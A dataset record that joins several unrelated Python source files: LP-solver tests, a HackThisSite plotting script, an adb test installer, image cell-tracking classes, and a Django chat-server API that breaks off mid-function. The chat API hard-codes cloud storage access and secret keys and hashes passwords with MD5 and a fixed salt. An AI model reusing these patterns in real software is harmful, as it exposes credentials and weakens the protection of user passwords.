     1, 0.995, [-1, -0.5], [-1, 1]),

    ([1, 2, 0],
     (1.36866544, 1.28199038, -0.19515422, 0.97578149, 0.64391477,
      -0.0811908, -0.70696349, -1.01804875, 0.5742392, 0.02939029),
     (0.1969094, 1.13910161, 0.10109674, 1.71246466, -0.45206747,
      -0.51302219, -1.16558797, 0.19919171, -0.906885, 0.94722345),
     (-2.68926068, -1.59762444, -2.03337493, -2.04617298, -1.09241401,
      -1.67319798, -1.9483617, -1.57529407, -1.37795315, -3.47919232), [-100, -100], [100, 100],
     [0, 1], 1, 2.5547484757095305, [-1.18181729266432, 1.8682828841869252], [3, 7]),

    ([1, 2, 0],
     (1.36866544, 1.28199038, -0.19515422, 0.97578149, 0.64391477,
      -0.0811908, -0.70696349, -1.01804875, 0.5742392, 0.02939029),
     (0.1969094, 1.13910161, 0.10109674, 1.71246466, -0.45206747,
      -0.51302219, -1.16558797, 0.19919171, -0.906885, 0.94722345),
     (-2.68926068, -1.59762444, -2.03337493, -2.04617298, -1.09241401,
      -1.67319798, -1.9483617, -1.57529407, -1.37795315, -3.47919232), [-100, -100], [100, 100],
     [5, 9], 1, 2.5547484757095305, [-1.18181729266432, 1.8682828841869252], [3, 7]),

    ([1, 2, 0], [-0.01, 0.01], [-1, 1], [0, 0.5],
     [-1, -1], [1, 1], [0, 1], 0, None, None, None)
]

# One id per entry above (pytest -k friendly names).
testids_correct = [
    "fixbound1",
    "fixbound2",
    "two_constraints",
    "two_constraints",
    "random_10_c_warms",
    "random_10_c_warms",
    "bug"
]
@pytest.mark.parametrize("v, a, b, c, low, high, active_c,"
                         "res_expected, optval_expected, optvar_expected, active_c_expected",
                         testdata_correct, ids=testids_correct)
def test_correct(v, a, b, c, low, high, active_c, res_expected, optval_expected,
                 optvar_expected, active_c_expected):
    """Test a few correct instances."""
    # a of None means an instance with only bound constraints.
    if a is None:
        a_np = None
        b_np = None
        c_np = None
    else:
        a_np = np.array(a, dtype=float)
        b_np = np.array(b, dtype=float)
        c_np = np.array(c, dtype=float)
    data = seidel.solve_lp2d(np.array(v, dtype=float), a_np, b_np, c_np,
                             np.array(low, dtype=float), np.array(high, dtype=float), np.array(active_c, dtype=int))
    res, optval, optvar, active_c = data
    if res_expected == 1:
        # Feasible: check the optimum, the optimizer and the active set.
        assert res == res_expected
        np.testing.assert_allclose(optval, optval_expected)
        np.testing.assert_allclose(optvar, optvar_expected)
        assert set(active_c) == set(active_c_expected)
    else:
        # Infeasible: only the status flag is meaningful.
        assert res == res_expected
@pytest.mark.parametrize("seed", range(100))
def test_random_constraints(seed):
    """Generate random problem data, solve with cvxpy and then compare!

    Generated problems can be feasible or infeasible. Both cases are
    tested in this unit test."""
    # generate random problem data
    d = 50
    np.random.seed(seed)
    seeds = np.random.randint(1000, size=7)
    np.random.seed(seeds[0])
    v = np.random.randn(3)
    np.random.seed(seeds[1])
    a, b = np.random.randn(2, d)
    np.random.seed(seeds[2])
    # Even seeds force strictly negative c (always feasible at origin);
    # odd seeds allow possibly-infeasible instances.
    if seed % 2 == 0:
        c = - np.random.rand(d)
    else:
        c = np.random.randn(d)
    low = np.r_[-0.5, -0.9]
    high = np.r_[0.5, 0.9]
    np.random.seed(seeds[3])
    active_c = np.random.choice(d, size=2)

    # solve with cvxpy (reference solution)
    x = cvx.Variable(2)
    constraints = [a * x[0] + b * x[1] + c <= 0,
                   low <= x, x <= high]
    obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
    prob = cvx.Problem(obj, constraints)
    prob.solve(solver='CVXOPT')

    # solve with the method to test and assert correctness
    data = seidel.solve_lp2d(v, a, b, c, low, high, active_c)
    res, optval, optvar, active_c = data
    if prob.status == "optimal":
        assert res == 1
        np.testing.assert_allclose(optval, prob.value, atol=1e-6)
        np.testing.assert_allclose(optvar, np.asarray(x.value).flatten(), atol=1e-6)
    elif prob.status == "infeasible":
        assert res == 0
    else:
        assert False, "Solve this LP with cvxpy returns status: {:}".format(
            prob.status)
def test_err1():
    """A case seidel solver fails to solve correctly. I discovered this
    while working on toppra.

    Regression test: the fixed problem data below previously tripped the
    solver when warm-started with the given active constraint pair.
    """
    v = array([-1.e-09, 1.e+00, 0.e+00])
    a = array([-0.02020202, 0.02020202, 1.53515768, 4.3866269, -
               3.9954173, -1.53515768, -4.3866269, 3.9954173])
    b = array([-1., 1., -185.63664301, 156.27072783, -
               209.00954213, 185.63664301, -156.27072783, 209.00954213])
    c = array([0., -0.0062788, -1., -2., -4., -1., -1., -1.])
    low = array([-100., 0.])
    high = array([1.00000000e+02, 6.26434609e-02])
    data = seidel.solve_lp2d(v, a, b, c, low, high, np.array(
        [0, 5]))  # only break at this active constraints
    res, optval, optvar, active_c = data

    # solve with cvxpy (reference solution)
    x = cvx.Variable(2)
    constraints = [a * x[0] + b * x[1] + c <= 0,
                   low <= x, x <= high]
    obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
    prob = cvx.Problem(obj, constraints)
    prob.solve()

    # solve with the method to test and assert correctness
    if prob.status == "optimal":
        assert res == 1
        np.testing.assert_allclose(optval, prob.value)
        np.testing.assert_allclose(optvar, np.asarray(x.value).flatten())
    elif prob.status == "infeasible":
        assert res == 0
    else:
        assert False, "Solve this LP with cvxpy returns status: {:}".format(
            prob.status)
def test_err2():
    """A case that fails. Discovered on 31/10/2018.

    Regression test: fixed problem data plus a warm-start active pair
    that previously produced a wrong first coordinate; only the second
    coordinate of the optimizer is asserted below.
    """
    v = array([-1.e-09, 1.e+00, 0.e+00])
    a = array([-0.04281662, 0.04281662, 0., 0., 0.,
               0., 0., 0., 0., 0.,
               0., 0., 0., 0., 0.,
               0., -1.27049648, 0.63168407, 0.54493736, -0.17238098,
               0.22457236, 0.6543007, 1.24159883, 1.27049648, -0.63168407,
               -0.54493736, 0.17238098, -0.22457236, -0.6543007, -1.24159883])
    b = array([-1., 1., -70.14534325, 35.42759706,
               31.23305996, -9.04430553, 12.51402852, 36.71562421,
               68.63795557, 70.14534325, -35.42759706, -31.23305996,
               9.04430553, -12.51402852, -36.71562421, -68.63795557,
               -9.70931351, 4.71707751, 3.93518034, -1.41196299,
               1.69317949, 4.88204872, 9.47085771, 9.70931351,
               -4.71707751, -3.93518034, 1.41196299, -1.69317949,
               -4.88204872, -9.47085771])
    c = array([0., -1.56875277, -50., -50.,
               -50., -50., -50., -50.,
               -50., -50., -50., -50.,
               -50., -50., -50., -50.,
               -50., -50., -50., -50.,
               -50., -50., -50., -50.,
               -50., -50., -50., -50.,
               -50., -50.])
    low = array([-1.e+08, 0.e+00])
    high = array([1.e+08, 1.e+08])
    active_c = np.array([0, -4])
    data = seidel.solve_lp2d(
        v, a, b, c, low, high, np.array([0, -4]))  # only break at this active constraints
    res, optval, optvar, active_c = data

    # solve with cvxpy (reference solution)
    x = cvx.Variable(2)
    constraints = [a * x[0] + b * x[1] + c <= 0,
                   low <= x, x <= high]
    obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
    prob = cvx.Problem(obj, constraints)
    prob.solve(solver='CVXOPT')

    # solve with the method to test and assert correctness
    if prob.status == "optimal":
        assert res == 1
        np.testing.assert_allclose(optval, prob.value)
        # Only x[1] is checked: the optimum is degenerate in x[0].
        np.testing.assert_allclose(optvar[1], np.asarray(x.value).flatten()[1])
    elif prob.status == "infeasible":
        assert res == 0
    else:
        assert False, "Solve this LP with cvxpy returns status: {:}".format(
            prob.status)
| mit |
MarcusTherkildsen/HackThisSite | prog_missions/4/main.py | 1 | 3379 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 07 22:10:39 2015
@author: Marcus Therkildsen
"""
from __future__ import division
import matplotlib.pyplot as plt
import numpy as np
def deg2rad(angle_deg):
    """Convert an angle from degrees to radians."""
    return (angle_deg * np.pi) / 180
def xy(r, phi):
    """Return Cartesian (x, y) for polar radius ``r`` and angle ``phi`` (radians)."""
    x_coord = r * np.cos(phi)
    y_coord = r * np.sin(phi)
    return x_coord, y_coord
if __name__ == '__main__':

    # Load the xml file (one tag/field per row; Python 2 script: xrange).
    xml = np.genfromtxt('plotMe.xml', delimiter=',', dtype='str',autostrip = True)

    # Number of line elements
    num_lines = list(xml).count('<Line>')

    # Number of arc elements
    num_arcs = list(xml).count('<Arc>')

    # Prepare arrays
    lines = np.zeros([num_lines,4]) # (x_start,x_end,y_start,y_end)
    c_lines = np.empty(num_lines,dtype='str')

    arcs = np.zeros([num_arcs,5]) # (x_center,y_center, arc_start (in degrees), arc_extend (in degrees), radius)
    c_arcs = np.empty(num_arcs,dtype='str')

    # Go through xml document, slicing each "<Tag>value</Tag>" row by fixed
    # offsets to extract the value between the tags.
    tj_lines = -1
    tj_arcs = -1
    for i in xrange(len(xml)):

        if '<Line>' in xml[i]:
            tj_lines+=1

            # In case no color is defined, predefine it to be white
            color_ = 'w'
            for k in xrange(5):
                if 'YEnd' in xml[i+k+1]:
                    y_end = float(xml[i+k+1][6:-7])
                elif 'YStart' in xml[i+k+1]:
                    y_start = float(xml[i+k+1][8:-9])
                elif 'XEnd' in xml[i+k+1]:
                    x_end = float(xml[i+k+1][6:-7])
                elif 'XStart' in xml[i+k+1]:
                    x_start = float(xml[i+k+1][8:-9])
                elif 'Color' in xml[i+k+1]:
                    color_ = xml[i+k+1][7:-8]

            lines[tj_lines,:] = [x_start, x_end, y_start, y_end]
            c_lines[tj_lines] = color_

        if '<Arc>' in xml[i]:
            tj_arcs+=1

            # In case no color is defined, predefine it to be white
            color_ = 'w'
            for k in xrange(6):
                if 'XCenter' in xml[i+k+1]:
                    x_center = float(xml[i+k+1][9:-10])
                elif 'YCenter' in xml[i+k+1]:
                    y_center = float(xml[i+k+1][9:-10])
                elif 'ArcStart' in xml[i+k+1]:
                    arc_start = float(xml[i+k+1][10:-11])
                elif 'ArcExtend' in xml[i+k+1]:
                    arc_extend = float(xml[i+k+1][11:-12])
                elif 'Radius' in xml[i+k+1]:
                    radius = float(xml[i+k+1][8:-9])
                elif 'Color' in xml[i+k+1]:
                    color_ = xml[i+k+1][7:-8]

            arcs[tj_arcs,:] = [x_center,y_center,arc_start,arc_extend,radius]
            c_arcs[tj_arcs] = color_

    """
    Plot
    """
    fig, ax =plt.subplots()

    # Color background black
    ax.set_axis_bgcolor('k')

    [ax.plot(lines[i,:2],lines[i,2:],color = c_lines[i]) for i in xrange(num_lines)]

    # Plot the arcs. Remember that the arc should begin at arc_start and end at arc_start + arc_extend
    for i in xrange(num_arcs):
        # Sample the arc at 0.1 rad steps, then translate to its center.
        stuff = np.array(xy(arcs[i,4],np.arange(deg2rad(arcs[i,2]),deg2rad(arcs[i,2])+deg2rad(arcs[i,3]),0.1))).T
        x_ = stuff[:,0]+arcs[i,0]
        y_ = stuff[:,1]+arcs[i,1]
        ax.plot(x_,y_,color = c_arcs[i])

    # Remove labels
    plt.setp( ax.get_xticklabels(), visible=False)
    plt.setp( ax.get_yticklabels(), visible=False)

    plt.savefig('done.png',dpi=400,bbox_inches='tight')
    plt.show()
XiaosongWei/crosswalk-test-suite | wrt/wrt-sharedmode-android-tests/inst.apk.py | 19 | 6532 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))  # directory holding this installer
PKG_NAME = os.path.basename(SCRIPT_DIR)  # test-suite package name, derived from the folder
TEST_PREFIX = os.environ['HOME']  # default unpack prefix; overridden by -t in main()
PARAMETERS = None  # parsed command-line options, set in main()
ADB_CMD = "adb"  # adb binary used for all device interaction
def doCMD(cmd):
    """Run a shell command, echoing its output live.

    Returns (return_code, output_lines); return_code is the process exit
    status (or the last poll() value seen).
    """
    # Do not need handle timeout in this short script, let tool do it
    print "-->> \"%s\"" % cmd
    output = []
    cmd_return_code = 1
    cmd_proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)

    while True:
        output_line = cmd_proc.stdout.readline().strip("\r\n")
        cmd_return_code = cmd_proc.poll()
        # Empty line plus a finished process means EOF.
        if output_line == '' and cmd_return_code is not None:
            break
        sys.stdout.write("%s\n" % output_line)
        sys.stdout.flush()
        output.append(output_line)

    return (cmd_return_code, output)
def overwriteCopy(src, dest, symlinks=False, ignore=None):
    """Recursively copy *src* into *dest*, overwriting existing entries.

    Like shutil.copytree but tolerant of an existing destination tree.
    When *symlinks* is true, symlinks are re-created rather than followed;
    *ignore* follows the shutil.copytree ignore-callable convention.
    """
    # Fix: 'stat' was referenced below but never imported anywhere in this
    # file, so the symlink-mode copy always died with a silently-swallowed
    # NameError.  Import it locally to keep the module surface unchanged.
    import stat

    if not os.path.exists(dest):
        os.makedirs(dest)
        shutil.copystat(src, dest)
    sub_list = os.listdir(src)
    if ignore:
        excl = ignore(src, sub_list)
        sub_list = [x for x in sub_list if x not in excl]
    for i_sub in sub_list:
        s_path = os.path.join(src, i_sub)
        d_path = os.path.join(dest, i_sub)
        if symlinks and os.path.islink(s_path):
            if os.path.lexists(d_path):
                os.remove(d_path)
            os.symlink(os.readlink(s_path), d_path)
            try:
                s_path_s = os.lstat(s_path)
                s_path_mode = stat.S_IMODE(s_path_s.st_mode)
                # os.lchmod only exists on some platforms (e.g. macOS);
                # best-effort, so failures are deliberately ignored.
                os.lchmod(d_path, s_path_mode)
            except Exception:
                pass
        elif os.path.isdir(s_path):
            overwriteCopy(s_path, d_path, symlinks, ignore)
        else:
            shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
    """Copy a file or directory tree to *dest_item*; True on success."""
    try:
        if os.path.isdir(src_item):
            # Directories are merged recursively, preserving symlinks.
            overwriteCopy(src_item, dest_item, symlinks=True)
            return True
        if not os.path.exists(os.path.dirname(dest_item)):
            os.makedirs(os.path.dirname(dest_item))
        shutil.copy2(src_item, dest_item)
        return True
    except Exception:
        return False
def uninstPKGs():
    """Uninstall every org.xwalk.<apk-name> package found next to this script.

    Returns False if adb reports "Failure" for any package.
    """
    action_status = True
    for root, dirs, files in os.walk(SCRIPT_DIR):
        for file in files:
            if file.endswith(".apk"):
                cmd = "%s -s %s uninstall org.xwalk.%s" % (
                    ADB_CMD, PARAMETERS.device, os.path.basename(os.path.splitext(file)[0]))
                (return_code, output) = doCMD(cmd)
                for line in output:
                    if "Failure" in line:
                        action_status = False
                        break

    # if os.path.isdir("%s/opt/%s/" % (TEST_PREFIX, PKG_NAME)):
    #shutil.rmtree("%s/opt/%s/" % (TEST_PREFIX, PKG_NAME))
    return action_status
def instPKGs():
    """Stage the test-suite files under TEST_PREFIX/opt/PKG_NAME.

    Copies everything except *.apk and inst.py, renames the bundled
    webapp apk, and (when present) pulls the crosswalk runtime named in
    /tmp/Crosswalk_sharedmode.conf into resources/installer.
    Returns False if any copy fails or doCMD output contains "Failure".
    """
    action_status = True
    # for root, dirs, files in os.walk(SCRIPT_DIR):
    #     for file in files:
    #         if file.endswith(".apk"):
    #             cmd = "%s -s %s install %s" % (ADB_CMD,
    #             PARAMETERS.device, os.path.join(root, file))
    for item in glob.glob("%s/*" % SCRIPT_DIR):
        if item.endswith(".apk"):
            continue
        elif item.endswith("inst.py"):
            continue
        else:
            item_name = os.path.basename(item)
            if not doCopy(item, "%s/opt/%s/%s" %
                          (TEST_PREFIX, PKG_NAME, item_name)):
                action_status = False
    os.rename(
        "%s/opt/%s/resources/apk/webappintel.apk" %
        (TEST_PREFIX, PKG_NAME), "%s/opt/%s/resources/apk/WebApp.apk" %
        (TEST_PREFIX, PKG_NAME))
    print "Package push to host %s/opt/%s successfully!" % (TEST_PREFIX, PKG_NAME)

    path = "/tmp/Crosswalk_sharedmode.conf"
    if os.path.exists(path):
        if not doCopy(path, "%s/opt/%s/Crosswalk_sharedmode.conf" %
                      (TEST_PREFIX, PKG_NAME)):
            action_status = False
        # Extract Android_Crosswalk_Path from the copied conf via shell.
        (
            return_code, output) = doCMD(
            "cat \"%s/opt/%s/Crosswalk_sharedmode.conf\" | grep \"Android_Crosswalk_Path\" | cut -d \"=\" -f 2" %
            (TEST_PREFIX, PKG_NAME))
        for line in output:
            if "Failure" in line:
                action_status = False
                break
        if not output == []:
            ANDROID_CROSSWALK_PATH = output[0]
            CROSSWALK = os.path.basename(ANDROID_CROSSWALK_PATH)
            if not doCopy(ANDROID_CROSSWALK_PATH, "%s/opt/%s/resources/installer/%s" %
                          (TEST_PREFIX, PKG_NAME, CROSSWALK)):
                action_status = False
    return action_status
def main():
    """Parse options, auto-detect a device if needed, then (un)install.

    -s device, -i install, -u uninstall (mutually exclusive), -t prefix.
    """
    try:
        global TEST_PREFIX
        usage = "usage: inst.py -i"
        opts_parser = OptionParser(usage=usage)
        opts_parser.add_option(
            "-s", dest="device", action="store", help="Specify device")
        opts_parser.add_option(
            "-i", dest="binstpkg", action="store_true", help="Install package")
        opts_parser.add_option(
            "-u", dest="buninstpkg", action="store_true", help="Uninstall package")
        opts_parser.add_option(
            "-t", dest="testprefix", action="store", help="unzip path prefix", default=os.environ["HOME"])
        global PARAMETERS
        (PARAMETERS, args) = opts_parser.parse_args()
    except Exception as e:
        print "Got wrong option: %s, exit ..." % e
        sys.exit(1)

    # No -s given: take the first device listed by adb.
    if not PARAMETERS.device:
        (return_code, output) = doCMD("adb devices")
        for line in output:
            if str.find(line, "\tdevice") != -1:
                PARAMETERS.device = line.split("\t")[0]
                break

    TEST_PREFIX = PARAMETERS.testprefix

    if not PARAMETERS.device:
        print "No device found"
        sys.exit(1)

    if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
        print "-i and -u are conflict"
        sys.exit(1)

    if PARAMETERS.buninstpkg:
        os.system(
            "%s -s %s uninstall %s" %
            (ADB_CMD,
             PARAMETERS.device,
             "org.xwalk.runtime.lib"))
        # if not uninstPKGs():
        #    sys.exit(1)
    else:
        # Default action (also covers -i): install the runtime library.
        os.system(
            "%s -s %s install -r %s" %
            (ADB_CMD,
             PARAMETERS.device,
             "resources/installer/XWalkRuntimeLib.apk"))
        # if not instPKGs():
        #    sys.exit(1)
# Script entry point: run main() and exit 0 (main exits non-zero itself
# on errors).
if __name__ == "__main__":
    main()
    sys.exit(0)
| bsd-3-clause |
lym/allura-git | Allura/allura/controllers/secure.py | 3 | 1060 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Sample controller with all its actions protected."""
# This controller is only used when you activate auth. You can safely remove
# this file from your project.
| apache-2.0 |
braysia/covertrack | covertrack/cell.py | 1 | 4510 | import numpy as np
from skimage.measure import regionprops
from copy import deepcopy
# Region properties persisted per detected cell: the scalar shape and
# intensity features (plus coordinates) that PropLight copies from
# skimage regionprops output.
PROP_SAVE = ['area', 'cell_id', 'convex_area', 'corr_x', 'corr_y', 'cv_intensity',
             'eccentricity', 'equivalent_diameter', 'euler_number', 'extent', 'filled_area',
             'major_axis_length', 'max_intensity', 'mean_intensity',
             'median_intensity', 'min_intensity', 'orientation',
             'perimeter', 'solidity', 'std_intensity', 'total_intensity', 'x', 'y',
             'coords']
class CellListMaker(object):
    '''Make a list of Cell objects'''

    def __init__(self, img, label, params, frame=0):
        self.img = img
        self.label = label
        self.params = params
        self.frame = frame

    def make_list(self):
        """Return one Cell per labeled region of the frame."""
        regions = regionprops(self.label, self.img, cache=True)
        return [Cell(region, self.frame) for region in regions]
class CellListMakerScalar(CellListMaker):
    '''Make a list of Cell objects but remove any regionprops features
    which are tuple, list or array to reduce memory usage.
    '''

    def make_list(self):
        """Return Cells whose props carry only scalar features."""
        if not self.label.any():
            return []
        regions = regionprops(self.label, self.img, cache=True)
        cells = [Cell(region, self.frame) for region in regions]
        # Discover vector-valued attributes on the first cell; all
        # cells share the same attribute set.
        sample = cells[0].prop
        vector_attrs = [name for name in dir(sample)
                        if not name.startswith('_')
                        and type(getattr(sample, name)) in (tuple, list, np.ndarray)]
        for name in vector_attrs:
            for cell in cells:
                cell.prop.__delattr__(name)
        return cells
class Prop(object):
    """Mutable snapshot of one skimage regionprops region.

    Copies every public regionprops property onto the instance and adds
    derived intensity statistics computed over non-zero pixels.
    (Python 2 API: dict.iterkeys.)
    """

    def __init__(self, prop):
        # Copy all public regionprops properties onto self.
        for ki in prop.__class__.__dict__.iterkeys():
            if '__' not in ki:
                setattr(self, ki, prop.__getitem__(ki))
        self.label_id = prop.label
        # Intensity statistics are computed over non-zero pixels only.
        pix = prop['intensity_image']
        pix = pix[pix != 0]
        # CAUTION
        # This will not reflected to the objects labels (segmentation)
        # if len(pix) > 2:
        #     pix = pix[(pix > np.nanpercentile(pix, 10)) * (pix<np.nanpercentile(pix, 90))]
        self.mean_intensity = np.mean(pix)
        self.median_intensity = np.median(pix)
        self.total_intensity = prop['area'] * np.mean(pix)
        self.std_intensity = np.std(pix)
        self.cv_intensity = np.std(pix)/np.mean(pix)
        # x/y mirror the centroid; corr_* are updated by jitter correction.
        self.x = self.centroid[1]
        self.corr_x = self.centroid[1] # will updated when jitter corrected
        self.y = self.centroid[0]
        self.corr_y = self.centroid[0] # will updated when jitter corrected
        # Tracking bookkeeping, filled in later by the tracker.
        self.parent_id = 0
        self.frame = np.nan
        self.abs_id = 0
        self.cell_id = 0
class PropLight(object):
    """Like Prop, but copies only the keys in PROP_SAVE and stores the
    derived intensity statistics as float32 to reduce memory usage.
    """

    def __init__(self, prop):
        # Copy only the whitelisted regionprops properties.
        for ki in prop.__class__.__dict__.iterkeys():
            if ki in PROP_SAVE:
                setattr(self, ki, prop.__getitem__(ki))
        self.label_id = prop.label
        # Intensity statistics are computed over non-zero pixels only.
        pix = prop['intensity_image']
        pix = pix[pix != 0]
        # CAUTION
        # This will not reflected to the objects labels (segmentation)
        # if len(pix) > 2:
        #     pix = pix[(pix > np.nanpercentile(pix, 10)) * (pix<np.nanpercentile(pix, 90))]
        self.mean_intensity = np.mean(pix, dtype=np.float32)
        self.median_intensity = np.median(pix)
        self.total_intensity = prop['area'] * np.mean(pix, dtype=np.float32)
        self.std_intensity = np.std(pix, dtype=np.float32)
        self.cv_intensity = np.std(pix, dtype=np.float32)/np.mean(pix, dtype=np.float32)
        # x/y mirror the centroid; corr_* are updated by jitter correction.
        self.x = prop['centroid'][1]
        self.corr_x = prop['centroid'][1] # will updated when jitter corrected
        self.y = prop['centroid'][0]
        self.corr_y = prop['centroid'][0] # will updated when jitter corrected
        # Tracking bookkeeping, filled in later by the tracker.
        self.parent_id = 0
        self.frame = np.nan
        self.abs_id = 0
        self.cell_id = 0
class Cell(object):
    '''Cell object which holds Prop.

    ``next`` and ``previous`` link to the associated cell in the
    following/preceding frame when one has been assigned.
    '''

    def __init__(self, prop, frame):
        self.frame = frame
        self.prop = PropLight(prop)
        self.cell_id = None
        self.parent = None
        # Doubly-linked chain across frames; unset until tracking runs.
        self._next = None
        self.previous = None

    @property
    def next(self):
        """The linked cell in the next frame, or None."""
        return self._next

    @next.setter
    def next(self, partner):
        # Keep the chain consistent: the partner points back at us.
        self._next = partner
        partner.previous = self
| mit |
hezuoguang/ZGVL | WLServer/api/function.py | 1 | 14259 | # -*- coding: UTF-8 -*-
__author__ = 'weimi'
from api.models import *
from django.db.models import Q
import hashlib
import re
import json
from qiniu import Auth
# SECURITY NOTE(review): Qiniu credentials and the password salt are
# hard-coded in source; they should live in configuration/environment
# and these keys should be rotated.
access_key = "MDWzu5EOTAbqoJp5EGxGcdksEcSLnixxAcGsbv2v"
secret_key = "IujhqwUXdusrrLYooPA4WZdJtS7RR6r65TALg2p_"
bucket_name = "weiliao"
pwdfix = "weimi"  # static salt appended to passwords before md5 hashing
photoCount = 43  # number of stock avatar images available
photoUrl = "http://7xl0k3.com1.z0.glb.clouddn.com/photo"  # avatar URL prefix
def safestr(str):
    """Sanitize text for embedding inside a double-quoted string.

    CR/TAB/LF become spaces; backslashes are doubled before quotes are
    escaped so the inserted escape characters are not re-escaped.
    """
    replacements = (
        ("\r", " "),
        ("\t", " "),
        ("\n", " "),
        ("\\", "\\\\"),
        ("\"", "\\\""),
    )
    for old, new in replacements:
        str = str.replace(old, new)
    return str
# 通过uid 和 pwd 获取一个用户 没有返回None
def queryUser(uid, pwd):
    """Return the User matching uid and salted-md5 password, or None."""
    pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
    try:
        user = User.objects.get(uid = uid, pwd = pwd)
    except User.DoesNotExist:
        # Narrowed from a bare 'except:': only a missing user means bad
        # credentials; unexpected errors (e.g. DB failures) now propagate
        # instead of masquerading as a failed login.
        return None
    return user
# 通过uid 和 pwd 注册一个用户 返回None表示 uid已被注册, -1 为 服务器发生错误
def registerUser(uid, pwd):
    """Create a user with the given uid and password.

    Returns the new User, None when the uid is already taken, or -1 when
    creation fails.
    NOTE(review): get-then-create is racy under concurrent requests; a
    unique constraint on uid is the real guard.
    """
    try:
        user = User.objects.get(uid = uid)
    except User.DoesNotExist:
        # uid is free -- create the account.
        try:
            user = User()
            user.uid = uid
            user.name = uid
            count = User.objects.count()
            # Assign one of the stock avatars round-robin.
            photo = photoUrl + str(count % photoCount + 1) + ".jpg"
            user.photo = photo
            user.pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
            user.access_token = hashlib.new("md5", uid + pwdfix + user.pwd).hexdigest()
            user.save()
            return user
        except Exception:
            # Narrowed from a bare 'except:'; -1 keeps the documented
            # "server error" contract for callers.
            return -1
    return None
# 参数 text(
# 聊天内容,文字消息为:消息内容; gif表情消息为:gif表情对应的图片名
# 称 名称;语音,图片消息为:资源的url
# )
# type(消息类型)
# access_token
# to_user(接收者uid)
# 返回:-1, 登录失效, -2, to_user不存在, None 服务器发生错误
def insertMessage(text, type, access_token, to_user):
    """Store a chat message from the authenticated sender to *to_user*.

    Returns {"message": msg} on success, -1 for an invalid access_token,
    -2 when to_user does not exist (or is the sender), None on error.
    """
    try:
        from_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        to_user = User.objects.get(uid = to_user)
    except:
        return -2
    try:
        # Sending to oneself is treated like an unknown recipient.
        if to_user.uid == from_user.uid:
            return -2
        message = Message()
        message.text = safestr(text)
        message.type = type
        message.to_user = to_user
        message.save()
        # NOTE(review): 'messgaes' is the (misspelled) related name on
        # the User model -- confirm before renaming.
        from_user.messgaes.add(message)
        from_user.save()
        return {"message" : message}
    except:
        return None
# 通过access_token 获得 消息id大于since_id的数据, 并且不多于 count 条
def queryNewMessages(since_id, access_token, count):
    """Fetch up to *count* messages involving the user with id > since_id.

    since_id <= 0 means "the most recent messages".  Returns
    {"messages": [...]}, -1 for a bad token, None on error.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        if (int)(since_id) > 0:
            # Messages received by user with id > since_id, newest count.
            messages_to_user = Message.objects.filter(to_user = user, id__gt = since_id).order_by("id")[0 : count]
            # Messages sent by user with id > since_id, newest count.
            messages_from_user = user.messgaes.filter(id__gt = since_id).order_by("id")[0 : count]
            # Merge both directions, dedupe, and keep the count oldest
            # (ascending id).
            messages = set()
            for message in messages_to_user:
                messages.add(message)
            for message in messages_from_user:
                messages.add(message)
            messages = sorted(list(messages), key=lambda m1:m1.id)[0 : count]
            return {"messages" : messages}
        else:
            # Most recent messages received by user.
            messages_to_user = Message.objects.filter(to_user = user).order_by("-id")[0 : count]
            # Most recent messages sent by user.
            messages_from_user = user.messgaes.all().order_by("-id")[0 : count]
            # Merge, dedupe, and keep the count newest (descending id).
            messages = set()
            for message in messages_to_user:
                messages.add(message)
            for message in messages_from_user:
                messages.add(message)
            messages = sorted(list(messages), key=lambda m1:-m1.id)[0 : count]
            return {"messages" : messages}
    except:
        return None
# 通过access_token 获得 消息id小于max_id的数据, 并且不多于 count 条
def queryOldMessages(max_id, access_token, count):
    """Fetch up to *count* messages involving the user with id < max_id.

    Returns {"messages": [...]} (newest first), -1 for a bad token,
    None on error.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        # Messages received by user with id < max_id, newest count.
        messages_to_user = Message.objects.filter(to_user = user, id__lt = max_id).order_by("-id")[0 : count]
        # Messages sent by user with id < max_id, newest count.
        messages_from_user = user.messgaes.filter(id__lt = max_id).order_by("-id")[0 : count]
        # Merge both directions, dedupe, keep the count newest.
        messages = set()
        for message in messages_to_user:
            messages.add(message)
        for message in messages_from_user:
            messages.add(message)
        messages = sorted(list(messages), key=lambda m1:-m1.id)[0 : count]
        return {"messages" : messages}
    except:
        return None
# 参数 text(
# text(状态内容)
# access_token
# pics(图片)
# 返回:-1, 登录失效, -2, to_user不存在, None 服务器发生错误
def insertStatus(text, access_token, pics):
    """Post a status with optional pictures for the authenticated user.

    *pics* is an iterable of picture URLs stored space-separated.
    Returns {"status": s}, -1 for a bad token, None on error.
    """
    try:
        from_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        status = Status()
        status.text = safestr(text)
        status.pics = " ".join(pics)
        status.from_user = from_user
        status.save()
        return {"status" : status}
    except:
        return None
# 通过access_token 获得 status id大于since_id的数据, 并且不多于 count 条
def queryNewStatuses(since_id, access_token, count):
    """Fetch up to *count* statuses from the user or their friends.

    since_id > 0 limits to statuses with a larger id; otherwise the most
    recent ones.  Each status's pics field is expanded into a URL list.
    Returns {"statuses": [...]} (newest first), -1 for a bad token,
    None on error.
    """
    try:
